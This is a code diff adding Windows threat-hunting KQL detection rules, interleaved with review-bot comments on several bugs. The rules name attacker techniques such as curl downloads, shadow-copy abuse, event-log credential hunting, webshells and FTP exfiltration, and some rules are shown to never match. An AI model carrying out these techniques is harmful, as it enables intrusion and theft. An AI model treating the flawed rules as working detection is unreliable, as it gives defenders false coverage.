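Review bot: `FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\"` in the ClickOnce hunk can never be true: FolderPath holds the full image path of the child process and ends in the executable name, not in a directory separator, so the rule matches nothing. The intent is evidently the ClickOnce application cache anywhere in the path; change it to `FolderPath contains "\\AppData\\Local\\Apps\\2.0\\"`.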
diff --git a/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql new file mode 100644 index 00000000..291edba0 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql @@ -0,0 +1,13 @@ +// Title: CMD Shell Output Redirect +// Author: frack113 +// Date: 2022-01-22 +// Level: low +// Description: Detects the use of the redirection character ">" to redirect information on the command line. +// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082, detection.threat-hunting +// False Positives: +// - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment + +DeviceProcessEvents +| where (ProcessCommandLine contains ">" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")) and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe" or ProcessCommandLine contains "chrome-extension://" or ProcessCommandLine contains "\\.\\pipe\\chrome.nativeMessaging"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql new file mode 100644 index 00000000..8ae99b14 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql 
@@ -0,0 +1,11 @@ +// Title: CodePage Modification Via MODE.COM +// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-19 +// Level: low +// Description: Detects a CodePage modification using the "mode.com" utility. +// This behavior has been used by threat actors behind Dharma ransomware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting + +DeviceProcessEvents +| where (ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql new file mode 100644 index 00000000..07bf3686 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql @@ -0,0 +1,13 @@ +// Title: Curl.EXE Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-05 +// Level: low +// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql new file mode 100644 index 00000000..0a262283 --- /dev/null 
+++ b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql @@ -0,0 +1,13 @@ +// Title: Curl.EXE Execution With Custom UserAgent +// Author: frack113 +// Date: 2022-01-23 +// Level: medium +// Description: Detects execution of curl.exe with custom useragent options +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql new file mode 100644 index 00000000..a158ba7a --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql @@ -0,0 +1,12 @@ +// Title: Diskshadow Child Process Spawned +// Author: Harjot Singh @cyb3rjy0t +// Date: 2023-09-15 +// Level: medium +// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting +// False Positives: +// - Likely from legitimate usage of Diskshadow in Interpreter mode. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\diskshadow.exe" and (not(FolderPath endswith ":\\Windows\\System32\\WerFault.exe")) \ No newline at end of file 
diff --git a/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql new file mode 100644 index 00000000..264c2921 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql @@ -0,0 +1,12 @@ +// Title: Diskshadow Script Mode Execution +// Author: Ivan Dyachkov, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting +// False Positives: +// - Likely from legitimate backup scripts + +DeviceProcessEvents +| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql new file mode 100644 index 00000000..b3b28d98 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql 
@@ -0,0 +1,13 @@ +// Title: DLL Call by Ordinal Via Rundll32.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-22 +// Level: medium +// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment. +// - Windows control panel elements have been identified as source (mmc). + +DeviceProcessEvents +| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql new file mode 100644 index 00000000..913435b7 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql 
@@ -0,0 +1,12 @@ +// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-02 +// Level: medium +// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting +// False Positives: +// - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies + +DeviceProcessEvents +| where ProcessCommandLine contains "/noconfig /fullpaths @" and FolderPath endswith "\\csc.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql new file mode 100644 index 00000000..3685b3c2 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql @@ -0,0 +1,10 @@ +// Title: Elevated System Shell Spawned +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-11-23 +// Level: medium +// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "powershell_ise.EXE", "pwsh.dll", "Cmd.Exe"))) and (LogonId =~ "0x3e7" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) \ No newline at end of file 
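Review bot: `LogonId =~ "0x3e7"` in the Elevated System Shell hunk uses case-insensitive string equality against a hex literal, but LogonId in DeviceProcessEvents is a numeric column holding the decimal session id, so the SYSTEM session is never matched and the rule is dead; write `LogonId == 999`. The companion `AccountName contains "AUTHORI" or AccountName contains "AUTORI"` likely fails as well, since the advanced-hunting schema carries the domain part in AccountDomain and AccountName is just the account; `AccountDomain =~ "nt authority"` is the equivalent there. The same AUTHORI/AUTORI test on InitiatingProcessAccountName appears in the network_connection_initiated_by_powershell_process hunk and should be reviewed with it.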
diff --git a/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql new file mode 100644 index 00000000..30269d98 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql @@ -0,0 +1,12 @@ +// Title: EventLog Query Requests By Builtin Utilities +// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-20 +// Level: medium +// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. +// MITRE Tactic: Credential Access +// Tags: attack.t1552, attack.credential-access, detection.threat-hunting +// False Positives: +// - Legitimate log access by administrators or troubleshooting tools + +DeviceProcessEvents +| where (ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql new file mode 100644 index 00000000..4f9ab5da --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql 
@@ -0,0 +1,13 @@ +// Title: Execution From Webserver Root Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting +// False Positives: +// - Various applications +// - Tools that include ping or nslookup command invocations + +DeviceProcessEvents +| where (FolderPath contains "\\wwwroot\\" or FolderPath contains "\\wmpub\\" or FolderPath contains "\\htdocs\\") and (not(((FolderPath contains "bin\\" or FolderPath contains "\\Tools\\" or FolderPath contains "\\SMSComponent\\") and InitiatingProcessFolderPath endswith "\\services.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql new file mode 100644 index 00000000..fdba60b6 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql 
@@ -0,0 +1,14 @@ +// Title: File Download Via Curl.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-05 +// Level: medium +// Description: Detects file download using curl.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity +// - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " + +DeviceProcessEvents +| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql new file mode 100644 index 00000000..ebe4e593 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql 
@@ -0,0 +1,13 @@
+// Title: File or Folder Permissions Modifications
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-23
+// Level: medium
+// Description: Detects a file or folder's permissions being modified or tampered with.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting
+// False Positives:
+// - Users interacting with the files on their own (unlikely unless privileged users).
+// - Dynatrace app
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "/grant" or ProcessCommandLine contains "/setowner" or ProcessCommandLine contains "/inheritance:r") and (FolderPath endswith "\\cacls.exe" or FolderPath endswith "\\icacls.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "-r" and FolderPath endswith "\\attrib.exe") or FolderPath endswith "\\takeown.exe") and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\Avira" or ProcessCommandLine contains ":\\Program Files\\Avira") or ProcessCommandLine endswith "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset" or (ProcessCommandLine contains "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r " and ProcessCommandLine contains "S-1-5-19:F") or (ProcessCommandLine contains "\\AppData\\Local\\Programs\\Microsoft VS Code" or ProcessCommandLine contains ":\\Program Files\\Microsoft VS Code"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql
new file mode 100644
index 00000000..241dcbd5
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql
@@ -0,0 +1,10 @@
+// Title: FTP Connection Open Attempt Via Winscp CLI
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "open " and ProcessCommandLine contains "ftp://") and (ProcessCommandLine contains "-command" or ProcessCommandLine contains "/command" or ProcessCommandLine contains "–command" or ProcessCommandLine contains "—command" or ProcessCommandLine contains "―command")) and (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql
new file mode 100644
index 00000000..63deac6a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql
@@ -0,0 +1,11 @@
+// Title: Headless Process Launched Via Conhost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag.
+// The "--headless" flag hides the windows from the user upon execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine contains "--headless" and InitiatingProcessFolderPath endswith "\\conhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql
new file mode 100644
index 00000000..ab8db468
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql
@@ -0,0 +1,15 @@
+// Title: HTML File Opened From Download Folder
+// Author: Joseph Kamau
+// Date: 2025-12-05
+// Level: low
+// Description: Detects web browser process opening an HTML file from a user's Downloads folder.
+// This behavior is could be associated with phishing attacks where threat actors send HTML attachments to users.
+// When a user opens such an attachment, it can lead to the execution of malicious scripts or the download of malware.
+// During investigation, analyze the HTML file for embedded scripts or links, check for any subsequent downloads or process executions, and investigate the source of the email or message containing the attachment.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1598.002, attack.t1566.001, attack.initial-access, attack.reconnaissance, detection.threat-hunting
+// False Positives:
+// - Opening any HTML file located in users directories via a browser process will trigger this.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\users\\" and ProcessCommandLine contains "\\Downloads\\" and ProcessCommandLine contains ".htm") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql
new file mode 100644
index 00000000..6d851d21
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Import New Module Via PowerShell CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: low
+// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not(((ProcessCommandLine contains ":\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "Tools\\Microsoft.VisualStudio.DevShell.dll") and (InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\cmd.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
new file mode 100644
index 00000000..56f403c9
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
@@ -0,0 +1,14 @@
+// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace.
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting
+// False Positives:
+// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".AesCryptoServiceProvider" or ProcessCommandLine contains ".DESCryptoServiceProvider" or ProcessCommandLine contains ".DSACryptoServiceProvider" or ProcessCommandLine contains ".RC2CryptoServiceProvider" or ProcessCommandLine contains ".Rijndael" or ProcessCommandLine contains ".RSACryptoServiceProvider" or ProcessCommandLine contains ".TripleDESCryptoServiceProvider") and ProcessCommandLine contains "System.Security.Cryptography." and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql
new file mode 100644
index 00000000..01966444
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql
@@ -0,0 +1,17 @@
+// Title: Manual Execution of Script Inside of a Compressed File
+// Author: @kostastsale
+// Date: 2023-02-15
+// Level: medium
+// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries.
+// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios.
+// 1. Compressed file opened using 7zip.
+// 2. Compressed file opened using WinRar.
+// 3. Compressed file opened using native windows File Explorer capabilities.
+// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.threat-hunting
+// False Positives:
+// - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*" and InitiatingProcessFolderPath =~ "*\\7z*.exe") or ((ProcessCommandLine contains "\\AppData\\local\\temp*.rar\\" or ProcessCommandLine contains "\\AppData\\local\\temp*.zip\\") and InitiatingProcessFolderPath endswith "\\explorer.exe") or (ProcessCommandLine =~ "*\\AppData\\local\\temp\\rar*\*" and InitiatingProcessFolderPath endswith "\\winrar.exe")) and ((ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".js" or ProcessCommandLine endswith ".jse" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".wsf" or ProcessCommandLine endswith ".wsh") and (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql
new file mode 100644
index 00000000..6b91719e
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql
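Review bot: The 7-Zip and WinRAR selections in the `| where` line can never match, because `=~` is case-insensitive equality in KQL and `contains` takes a literal substring, so the `*` characters carried over from the Sigma wildcards are compared literally (and I am not certain `\*` is an accepted escape in a regular KQL string literal, so the clause should also be checked for a parse error). Only the explorer.exe branch is partly live, and it still requires the literal text `temp*.rar\` to appear in the command line. The wildcard values need a pattern operator, e.g. `ProcessCommandLine matches regex @"(?i)\\AppData\\local\\temp\\7z.*\\"`, `InitiatingProcessFolderPath matches regex @"(?i)\\7z.*\.exe$"` and `ProcessCommandLine matches regex @"(?i)\\AppData\\local\\temp.*\.(rar|zip)\\"`, with the analogous pattern for the WinRAR branch. Since these files are produced by helper.py, the same mistranslation presumably recurs for any Sigma value with an interior wildcard, so the fix belongs in the converter as well as in this output.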
@@ -0,0 +1,12 @@
+// Title: Microsoft Workflow Compiler Execution
+// Author: Nik Seetharaman, frack113
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Legitimate MWC use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql
new file mode 100644
index 00000000..47ec7162
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Net.EXE Execution
+// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects execution of "Net.EXE".
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " accounts" or ProcessCommandLine contains " group" or ProcessCommandLine contains " localgroup" or ProcessCommandLine contains " share" or ProcessCommandLine contains " start" or ProcessCommandLine contains " stop " or ProcessCommandLine contains " user" or ProcessCommandLine contains " view") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql
new file mode 100644
index 00000000..5b0f2baa
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql
@@ -0,0 +1,14 @@
+// Title: New Self Extracting Package Created Via IExpress.EXE
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-02-05
+// Level: medium
+// Description: Detects the "iexpress.exe" utility creating self-extracting packages.
+// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
+// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Administrators building packages using iexpress.exe
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\makecab.exe" or ProcessVersionInfoOriginalFileName =~ "makecab.exe") and InitiatingProcessFolderPath endswith "\\iexpress.exe") or (ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
new file mode 100644
index 00000000..0e74803a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
+// Author: frack113
+// Date: 2024-05-03
+// Level: low
+// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting
+// False Positives:
+// - Administrator script
+
+DeviceProcessEvents
